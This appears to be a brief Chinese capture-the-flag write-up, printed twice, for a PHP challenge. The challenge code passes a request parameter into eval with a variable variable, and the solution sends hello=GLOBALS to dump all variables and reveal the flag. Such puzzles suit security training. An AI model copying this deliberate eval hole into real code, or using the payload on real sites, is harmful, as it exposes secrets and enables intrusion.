题目内容:
flag就在某六位变量中。
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>
只匹配纯字母,在 var_dump 中有两个 $,使用 GLOBALS dump 出全部变量
hello=GLOBALS
题目内容:
flag就在某六位变量中。
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>
只匹配纯字母,在 var_dump 中有两个 $,使用 GLOBALS dump 出全部变量
hello=GLOBALS